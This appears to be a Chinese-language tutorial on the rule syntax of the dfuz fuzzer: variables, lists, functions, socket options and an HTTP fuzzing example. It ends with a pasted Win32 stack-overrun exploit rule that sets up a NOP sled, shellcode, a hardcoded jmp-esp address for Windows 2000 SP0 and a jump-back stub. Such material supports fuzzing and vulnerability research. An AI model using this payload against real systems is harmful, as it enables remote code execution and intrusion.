var myVar = "Something"
var myVar2 = "String",0x41,|0xdeadbeef|,|0xdeadbeefx5|,|"\x41\x41\x41\x41"x2|,[Bx50],[\x45x6],["Hello"x4],1024,{b040d0b4-b040d0b8- x 1}
var myVar3 = $myVar2
--------------
list:
list some_list:
begin
some_data
some_data
some_data
end
--------------
函数
- %dec2str(num) : Converts (num) to a string and inserts it at this position. //函数说明
Example: %dec2str(1024) //调用
Result: "1024"
---------------
Options
指定这个配置文件的选项
支持选项有:
- interact: performs a select() between the client and server after every "peer" command has been processed.
- keep_connecting: continues processing even if the connection cannot be established (in short: DON'T EXIT).
- big_endian: makes {} formats big-endian (little-endian is the default)
- little_endian: makes {} formats little-endian (default)
- tcp: will make a stream socket
- udp: will make a datagram socket
- client_side: connects to a server. (Default)
- server_side: acts as a server waiting for a connection.
- use_stdout: makes the socket stdout instead of a peer; to use this, the host must also be set to "stdout".
---------
我们利用以上语法来看一个http协议rules的例子:
例如:
port = 80/tcp
list some_list:
begin
GET
HEAD
End
var get_file = "/index.html"
var content_length = %dec2str(0xffffffff)
root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# cat win32-xpl.rule
# Some rule to exploit a win32 stack overrun example.
# Diego Bauche
<inc "./vars/shellcodes.vars">
var shellcode = $win32_alnum_scode
var nops_len = %length(1032-$shellcode)
var nops_first = [\x90x$nops_len]
var nops_last = [\x90x36]
# jmp esp - windows 2000 sp0
var eip = |77e822ea|
# Nasty, sub sp, 400 - jmp esp
var jump_back = 0x66,0x81,0xec,0x02,0x04,0x8b,0xec,0xff,0xe4
var payload = $nops_first,$shellcode,%random:dword(),$eip,$nops_last,$jump_back